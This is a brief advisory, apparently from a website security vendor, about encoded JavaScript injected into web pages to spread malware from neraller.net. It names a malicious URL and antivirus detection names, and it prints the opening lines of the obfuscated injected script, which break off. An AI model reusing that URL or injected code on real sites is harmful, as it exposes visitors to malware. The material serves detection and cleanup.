Description:
A malicious (and encoded) javascript code was found inside the site content and is being used to distribute malware (from neraller.net and other domains). Any user visiting the infected site could be compromised (desktop antivirus will flag it as JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW and others, depending on the intermediary domains and AV product).
Domains used in this attack:
http://neraller.net/in.cgi?default
(and many others)
Affecting:
Any web site (no specific target).
Clean up:
This malware is generally hidden at the bottom of the .html or PHP files. Sign up here to get it clean up: Signup
Malware dump (sample of malware):
var kNJPYXFhNDnBfyGlhCTiNuSj="";GAKghPQObdpU='sDCsNsmtIasfISJlZuRIewV';
var ojJXuD='CoytyuhDSaXKKGIbjfnNYXoMLTbyCFJtyyQKwlYEepcUCTl';
cRDncEyF='MbRslhfscsndlaYllHigdDrr';
var fVzJeVJZmtL=0;GTpymsargrqfRduBl='HLvHio';
var IphRwA='..